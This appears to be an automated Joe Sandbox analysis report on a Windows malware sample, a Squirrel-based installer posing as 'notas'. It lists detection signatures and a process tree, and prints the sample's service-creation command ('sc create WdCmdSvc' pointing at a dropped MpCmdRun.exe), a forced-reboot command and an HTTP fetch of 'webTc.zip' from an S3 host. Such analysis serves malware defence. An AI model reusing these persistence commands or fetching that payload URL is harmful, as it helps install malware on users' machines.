Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
0219830219301290321012notas.exe

Overview

General Information

Sample name:0219830219301290321012notas.exe
Analysis ID:1397701
MD5:a548469585481a1b7f98c9b09d271349
SHA1:677eabeb661d965c7d3d5ff6f6b9336e27b80b91
SHA256:21340c04b12af92f3bd3dd076e5a4f20c0fe5558461b5ff3f848e5d5b7183322
Tags:exe
Infos:

Detection

Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Drops or copies MsMpEng.exe (Windows Defender, likely to bypass HIPS)
Found evasive API chain checking for user administrative privileges
Machine Learning detection for dropped file
Uses shutdown.exe to shutdown or reboot the system
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
PE file does not import any functions
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Stores files to the Windows start menu directory
Tries to load missing DLLs
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • 0219830219301290321012notas.exe (PID: 6416 cmdline: "C:\Users\user\Desktop\0219830219301290321012notas.exe" --rerunningWithoutUAC MD5: A548469585481A1B7F98C9B09D271349)
    • Update.exe (PID: 1992 cmdline: "C:\Users\user\AppData\Local\SquirrelTemp\Update.exe" --install . --rerunningWithoutUAC MD5: A560BAD9E373EA5223792D60BEDE2B13)
      • BumpFiles.exe (PID: 3692 cmdline: "C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe" --squirrel-firstrun MD5: CC09BB7FDEFC5763CCB3CF7DAE2D76CF)
        • BumpFiles.exe (PID: 4284 cmdline: "C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe" MD5: CC09BB7FDEFC5763CCB3CF7DAE2D76CF)
          • cmd.exe (PID: 2172 cmdline: "C:\Windows\System32\cmd.exe" /C sc create WdCmdSvc binPath= "C:\Program Files (x86)\Microsoft.NET\MpCmdRun.exe" start= auto MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 2764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • sc.exe (PID: 320 cmdline: sc create WdCmdSvc binPath= "C:\Program Files (x86)\Microsoft.NET\MpCmdRun.exe" start= auto MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)
          • shutdown.exe (PID: 2300 cmdline: C:\WINDOWS\system32\shutdown.exe -r -t 1 -f MD5: FCDE5AF99B82AE6137FB90C7571D40C3)
            • conhost.exe (PID: 3620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
Update.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Local\ContentPack\Update.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
      C:\Users\user\AppData\Local\SquirrelTemp\Update.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        3.0.Update.exe.b50000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security

          Sigma Signatures

          System Summary

          barindex
          Sigma detected: New Service Creation Using Sc.EXE
          Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: sc create WdCmdSvc binPath= "C:\Program Files (x86)\Microsoft.NET\MpCmdRun.exe" start= auto, CommandLine: sc create WdCmdSvc binPath= "C:\Program Files (x86)\Microsoft.NET\MpCmdRun.exe" start= auto, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\sc.exe, NewProcessName: C:\Windows\SysWOW64\sc.exe, OriginalFileName: C:\Windows\SysWOW64\sc.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /C sc create WdCmdSvc binPath= "C:\Program Files (x86)\Microsoft.NET\MpCmdRun.exe" start= auto, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 2172, ParentProcessName: cmd.exe, ProcessCommandLine: sc create WdCmdSvc binPath= "C:\Program Files (x86)\Microsoft.NET\MpCmdRun.exe" start= auto, ProcessId: 320, ProcessName: sc.exe

          Snort Signatures

          No Snort rule has matched

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Multi AV Scanner detection for dropped file
          Source: C:\Program Files (x86)\Microsoft.NET\MpClient.dllVirustotal: Detection: 11%Perma Link
          Source: C:\Program Files (x86)\Microsoft.NET\MpCmdRun.dllVirustotal: Detection: 7%Perma Link
          Multi AV Scanner detection for submitted file
          Source: 0219830219301290321012notas.exeReversingLabs: Detection: 15%
          Source: 0219830219301290321012notas.exeVirustotal: Detection: 16%Perma Link
          Machine Learning detection for dropped file
          Source: C:\Program Files (x86)\Microsoft.NET\MpClient.dllJoe Sandbox ML: detected
          Source: 0219830219301290321012notas.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeRegistry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ContentPackJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeFile created: C:\Users\user\AppData\Local\SquirrelTemp\Squirrel-Install.logJump to behavior
          Source: unknownHTTPS traffic detected: 3.5.232.21:443 -> 192.168.2.5:49704 version: TLS 1.2
          Source: 0219830219301290321012notas.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
          Source: Binary string: D:\a\_work\1\s\\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: Update.exe, 00000003.00000002.2050601484.000000000328D000.00000004.00000800.00020000.00000000.sdmp, vcruntime140.dll.3.dr
          Source: Binary string: OfflineScannerShell.pdb source: OfflineScannerShell.exe.7.dr
          Source: Binary string: MpAzSubmit.pdb source: MpAzSubmit.dll.7.dr
          Source: Binary string: MpCmdRun.pdbGCTL source: MpCmdRun.exe0.7.dr
          Source: Binary string: netstandard.pdb.mdb source: Update.exe
          Source: Binary string: C:\Users\ani\code\squirrel\squirrel.windows\build\Release\Win32\StubExecutable.pdb source: Update.exe, 00000003.00000002.2050601484.0000000003267000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2050601484.0000000003245000.00000004.00000800.00020000.00000000.sdmp, BumpFiles.exe0.3.dr
          Source: Binary string: MpDetoursCopyAccelerator.pdb source: MpDetoursCopyAccelerator.dll.7.dr
          Source: Binary string: endpointdlp.pdb source: endpointdlp.dll.7.dr
          Source: Binary string: DefenderCSP.pdb source: DefenderCSP.dll.7.dr
          Source: Binary string: MpCmdRun.pdb source: MpCmdRun.exe0.7.dr
          Source: Binary string: endpointdlp.pdbGCTL source: endpointdlp.dll.7.dr
          Source: Binary string: shellext.pdb source: shellext.dll.7.dr
          Source: Binary string: MpDlpCmd.pdbGCTL source: MpDlpCmd.exe.7.dr
          Source: Binary string: C:\Users\ani\code\squirrel\squirrel.windows\build\Release\Win32\Setup.pdb source: 0219830219301290321012notas.exe
          Source: Binary string: MpAzSubmit.pdbGCTL source: MpAzSubmit.dll.7.dr
          Source: Binary string: ProtectionManagement.pdbGCTL source: ProtectionManagement.dll.7.dr
          Source: Binary string: MpCommu.pdb source: MpCommu.dll.7.dr
          Source: Binary string: MpDetoursCopyAccelerator.pdbGCTL source: MpDetoursCopyAccelerator.dll.7.dr
          Source: Binary string: MpCommu.pdbGCTL source: MpCommu.dll.7.dr
          Source: Binary string: shellext.pdbOGPS source: shellext.dll.7.dr
          Source: Binary string: ProtectionManagement.pdb source: ProtectionManagement.dll.7.dr
          Source: Binary string: MpDlpCmd.pdb source: MpDlpCmd.exe.7.dr
          Source: Binary string: MsMpEng.pdb source: Update.exe, 00000003.00000002.2050601484.00000000032B5000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2050601484.000000000323D000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2050601484.00000000031DD000.00000004.00000800.00020000.00000000.sdmp, BumpFiles.exe, BumpFiles.exe, 00000004.00000002.3857315150.0000000000C11000.00000020.00000001.01000000.00000008.sdmp, BumpFiles.exe, 00000007.00000000.2031196791.0000000000C11000.00000020.00000001.01000000.00000008.sdmp, MsMpEng.exe.7.dr
          Source: Binary string: MsMpEng.pdbGCTL source: MsMpEng.exe.7.dr
          Source: Binary string: OfflineScannerShell.pdbOGPS source: OfflineScannerShell.exe.7.dr
          Source: Binary string: DefenderCSP.pdbGCTL source: DefenderCSP.dll.7.dr
          Source: C:\Users\user\Desktop\0219830219301290321012notas.exeCode function: 0_2_00235564 FindFirstFileExW,0_2_00235564
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeCode function: 4_2_0040D3E4 FindFirstFileW,FindClose,4_2_0040D3E4
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeCode function: 4_2_0040CE18 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,4_2_0040CE18
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeCode function: 7_2_0040D3E4 FindFirstFileW,FindClose,7_2_0040D3E4
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeCode function: 7_2_0040CE18 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,7_2_0040CE18

          Networking

          barindex
          Yara detected Generic Downloader
          Source: Yara matchFile source: Update.exe, type: SAMPLE
          Source: Yara matchFile source: 3.0.Update.exe.b50000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: C:\Users\user\AppData\Local\ContentPack\Update.exe, type: DROPPED
          Source: Yara matchFile source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe, type: DROPPED
          Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
          Source: global trafficHTTP traffic detected: GET /webTc.zip HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: awsserver903203232.s3.sa-east-1.amazonaws.comConnection: Keep-Alive
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeCode function: 4_2_00633A38 Sleep,URLDownloadToFileW,Sleep,4_2_00633A38
          Source: global trafficHTTP traffic detected: GET /webTc.zip HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: awsserver903203232.s3.sa-east-1.amazonaws.comConnection: Keep-Alive
          Source: unknownDNS traffic detected: queries for: awsserver903203232.s3.sa-east-1.amazonaws.com
          Source: Update.exe, 00000003.00000002.2050601484.0000000003433000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2050601484.000000000331C000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2050601484.00000000032FA000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2050601484.000000000341A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/ContentPack.nuspec
          Source: Update.exe, 00000003.00000002.2050601484.00000000032FA000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2050601484.000000000341A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/_rels/.rels
          Source: Update.exe, 00000003.00000002.2050601484.00000000032FA000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2050601484.000000000341A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/lib/net48/BumpFiles.exe
          Source: Update.exe, 00000003.00000002.2050601484.00000000032FA000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2050601484.000000000341A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/lib/net48/BumpFiles_ExecutionStub.exe
          Source: Update.exe, 00000003.00000002.2050601484.00000000032FA000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2050601484.000000000341A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/lib/net48/MpSvc.dll
          Source: Update.exe, 00000003.00000002.2050601484.00000000032FA000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2050601484.000000000341A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/lib/net48/vcruntime140.dll
          Source: Update.exe, 00000003.00000002.2050601484.0000000003433000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2050601484.000000000331C000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2050601484.00000000032FA000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2050601484.000000000341A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/package/services/metadata/core-properties/63bdd4d7088c4a4c9e28aeaec7dfa81d.p
          Source: Update.exe, 00000003.00000002.2050601484.00000000032FA000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2050601484.000000000341A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/tempfiles/sample.bsdiff
          Source: Update.exe, 00000003.00000002.2050601484.00000000032FA000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2050601484.000000000341A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/tempfiles/sample.diff
          Source: Update.exe, 00000003.00000002.2050601484.00000000032FA000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2050601484.000000000341A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/tempfiles/sample.dll
          Source: Update.exe, 00000003.00000002.2050601484.00000000032FA000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2050601484.000000000341A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/tempfiles/sample.exe
          Source: Update.exe, 00000003.00000002.2050601484.00000000032FA000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2050601484.000000000341A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/tempfiles/sample.nuspec
          Source: Update.exe, 00000003.00000002.2050601484.00000000032FA000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2050601484.000000000341A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/tempfiles/sample.psmdcp
          Source: Update.exe, 00000003.00000002.2050601484.00000000032FA000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2050601484.000000000341A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/tempfiles/sample.rels
          Source: Update.exe, 00000003.00000002.2050601484.00000000032FA000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2050601484.000000000341A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/tempfiles/sample.shasum
          Source: MpCommu.dll.7.drString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-username-token-profile-1.0#PasswordDigest
          Source: MpCommu.dll.7.drString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
          Source: Update.exe, 00000003.00000002.2050601484.000000000341A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.openxmlformats.or
          Source: MpCommu.dll.7.drString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
          Source: ThirdPartyNotices.txt.7.drString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: BumpFiles.exeString found in binary or memory: http://www.delphiforfun.org/
          Source: BumpFiles.exe, 00000004.00000002.3855628720.0000000000401000.00000020.00000001.01000000.00000009.sdmp, BumpFiles.exe, 00000007.00000002.3855472220.0000000000401000.00000020.00000001.01000000.00000009.sdmp, MpSvc.dll.3.drString found in binary or memory: http://www.delphiforfun.org/openU
          Source: Update.exeString found in binary or memory: https://api.github.com/#
          Source: BumpFiles.exe, 00000007.00000002.3857430328.000000000341B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://awsserver903203232.s3.sa-east-1.amazonaws.com/
          Source: BumpFiles.exe, 00000007.00000002.3857430328.000000000341B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://awsserver903203232.s3.sa-east-1.amazonaws.com/S
          Source: BumpFiles.exe, 00000007.00000002.3857430328.000000000341B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://awsserver903203232.s3.sa-east-1.amazonaws.com/w
          Source: BumpFiles.exe, 00000007.00000002.3857430328.00000000033D3000.00000004.00000020.00020000.00000000.sdmp, BumpFiles.exe, 00000007.00000002.3857430328.000000000341B000.00000004.00000020.00020000.00000000.sdmp, BumpFiles.exe, 00000007.00000002.3857430328.00000000033B0000.00000004.00000020.00020000.00000000.sdmp, BumpFiles.exe, 00000007.00000003.2064736054.0000000003456000.00000004.00000020.00020000.00000000.sdmp, BumpFiles.exe, 00000007.00000002.3857980024.0000000004E2D000.00000004.00001000.00020000.00000000.sdmp, BumpFiles.exe, 00000007.00000002.3857430328.00000000033B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://awsserver903203232.s3.sa-east-1.amazonaws.com/webTc.zip
          Source: BumpFiles.exe, 00000007.00000003.2064736054.0000000003456000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://awsserver903203232.s3.sa-east-1.amazonaws.com/webTc.zipINC:
          Source: BumpFiles.exe, 00000007.00000003.2064736054.0000000003456000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://awsserver903203232.s3.sa-east-1.amazonaws.com/webTc.zipOID
          Source: BumpFiles.exe, 00000007.00000002.3857430328.000000000341B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://awsserver903203232.s3.sa-east-1.amazonaws.com/webTc.zipQ
          Source: ThirdPartyNotices.txt.7.drString found in binary or memory: https://github.com/Microsoft/cpprestsdk.
          Source: ThirdPartyNotices.txt.7.drString found in binary or memory: https://github.com/Microsoft/cpprestsdk/blob/master/license.txt)
          Source: Update.exeString found in binary or memory: https://github.com/myuser/myrepo
          Source: BumpFiles.exe, 00000007.00000002.3857430328.000000000341B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
          Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
          Source: unknownHTTPS traffic detected: 3.5.232.21:443 -> 192.168.2.5:49704 version: TLS 1.2

          System Summary

          barindex
          Uses shutdown.exe to shutdown or reboot the system
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeProcess created: C:\Windows\SysWOW64\shutdown.exe C:\WINDOWS\system32\shutdown.exe -r -t 1 -f
          Source: C:\Users\user\Desktop\0219830219301290321012notas.exeCode function: 0_2_002238F80_2_002238F8
          Source: C:\Users\user\Desktop\0219830219301290321012notas.exeCode function: 0_2_0023BAA40_2_0023BAA4
          Source: C:\Users\user\Desktop\0219830219301290321012notas.exeCode function: 0_2_002242C90_2_002242C9
          Source: C:\Users\user\Desktop\0219830219301290321012notas.exeCode function: 0_2_0023BBC80_2_0023BBC8
          Source: C:\Users\user\Desktop\0219830219301290321012notas.exeCode function: 0_2_002384D70_2_002384D7
          Source: C:\Users\user\Desktop\0219830219301290321012notas.exeCode function: 0_2_0022465F0_2_0022465F
          Source: C:\Users\user\Desktop\0219830219301290321012notas.exeCode function: 0_2_00237F400_2_00237F40
          Source: C:\Users\user\Desktop\0219830219301290321012notas.exeCode function: 0_2_002257580_2_00225758
          Source: C:\Users\user\Desktop\0219830219301290321012notas.exeCode function: 0_2_00222FF00_2_00222FF0
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeCode function: 3_2_00007FF848F4694D3_2_00007FF848F4694D
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeCode function: 3_2_00007FF848F20F183_2_00007FF848F20F18
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeCode function: 3_2_00007FF848F20F253_2_00007FF848F20F25
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeCode function: 3_2_00007FF848F4337D3_2_00007FF848F4337D
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeCode function: 3_2_00007FF848F443E03_2_00007FF848F443E0
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeCode function: 4_2_0040B9444_2_0040B944
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeCode function: 4_2_0052594C4_2_0052594C
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeCode function: 4_2_00525C0C4_2_00525C0C
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeCode function: 7_2_0040B9447_2_0040B944
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeCode function: 7_2_0052594C7_2_0052594C
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeCode function: 7_2_00525C0C7_2_00525C0C
          Source: Joe Sandbox ViewDropped File: C:\Program Files (x86)\Microsoft.NET\AMMonitoringProvider.dll BA543F2CF16CB1D1CFA87D7531E6045581EE76274C36D0C9DF8C131E05B86977
          Source: Joe Sandbox ViewDropped File: C:\Program Files (x86)\Microsoft.NET\ConfigSecurityPolicy.exe 545F9356969C1D50E6FA0DEF359900F84553A7FDA29EDC55693CDE8B399E52BB
          Source: Joe Sandbox ViewDropped File: C:\Program Files (x86)\Microsoft.NET\DefenderCSP.dll 7AF5A25F7991926C507FA1DDC56639E0242FCB4CBD1E4667EE660E52FE824BA6
          Source: C:\Users\user\Desktop\0219830219301290321012notas.exeCode function: String function: 0022B010 appears 32 times
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeCode function: String function: 0040C1E4 appears 32 times
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeCode function: String function: 0041028C appears 32 times
          Source: 0219830219301290321012notas.exeStatic PE information: Resource name: DATA type: Zip archive data, at least v2.0 to extract, compression method=deflate
          Source: NisSrv.exe.7.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
          Source: ProtectionManagement.dll.mui0.7.drStatic PE information: No import functions for PE file found
          Source: OfflineScannerShell.exe.mui0.7.drStatic PE information: No import functions for PE file found
          Source: MpEvMsg.dll.mui.7.drStatic PE information: No import functions for PE file found
          Source: MsMpLics.dll.7.drStatic PE information: No import functions for PE file found
          Source: MpEvMsg.dll.7.drStatic PE information: No import functions for PE file found
          Source: shellext.dll.mui0.7.drStatic PE information: No import functions for PE file found
          Source: MpAsDesc.dll.mui0.7.drStatic PE information: No import functions for PE file found
          Source: EppManifest.dll.mui.7.drStatic PE information: No import functions for PE file found
          Source: MsMpRes.dll.mui0.7.drStatic PE information: No import functions for PE file found
          Source: shellext.dll.mui.7.drStatic PE information: No import functions for PE file found
          Source: MpAsDesc.dll.7.drStatic PE information: No import functions for PE file found
          Source: MsMpLics.dll0.7.drStatic PE information: No import functions for PE file found
          Source: EppManifest.dll.mui0.7.drStatic PE information: No import functions for PE file found
          Source: OfflineScannerShell.exe.mui.7.drStatic PE information: No import functions for PE file found
          Source: MsMpRes.dll.7.drStatic PE information: No import functions for PE file found
          Source: MpAsDesc.dll.mui.7.drStatic PE information: No import functions for PE file found
          Source: MsMpRes.dll.mui.7.drStatic PE information: No import functions for PE file found
          Source: ProtectionManagement.dll.mui.7.drStatic PE information: No import functions for PE file found
          Source: MpEvMsg.dll.mui0.7.drStatic PE information: No import functions for PE file found
          Source: EppManifest.dll0.7.drStatic PE information: No import functions for PE file found
          Source: EppManifest.dll.7.drStatic PE information: No import functions for PE file found
          Source: 0219830219301290321012notas.exe, 00000001.00000003.2002772051.0000000001191000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUpdate.exe2 vs 0219830219301290321012notas.exe
          Source: 0219830219301290321012notas.exe, 00000001.00000003.2002772051.000000000119F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUpdate.exe2 vs 0219830219301290321012notas.exe
          Source: 0219830219301290321012notas.exeBinary or memory string: OriginalFilenameSetup.exe6 vs 0219830219301290321012notas.exe
          Source: C:\Users\user\Desktop\0219830219301290321012notas.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\0219830219301290321012notas.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\0219830219301290321012notas.exeSection loaded: logoncli.dllJump to behavior
          Source: C:\Users\user\Desktop\0219830219301290321012notas.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\Desktop\0219830219301290321012notas.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\0219830219301290321012notas.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\0219830219301290321012notas.exeSection loaded: sxs.dllJump to behavior
          Source: C:\Users\user\Desktop\0219830219301290321012notas.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Users\user\Desktop\0219830219301290321012notas.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Users\user\Desktop\0219830219301290321012notas.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\0219830219301290321012notas.exeSection loaded: logoncli.dllJump to behavior
          Source: C:\Users\user\Desktop\0219830219301290321012notas.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\Desktop\0219830219301290321012notas.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\0219830219301290321012notas.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\0219830219301290321012notas.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\0219830219301290321012notas.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\0219830219301290321012notas.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: dwrite.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: msvcp140_clr0400.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeSection loaded: ntmarta.dllJump to behavior
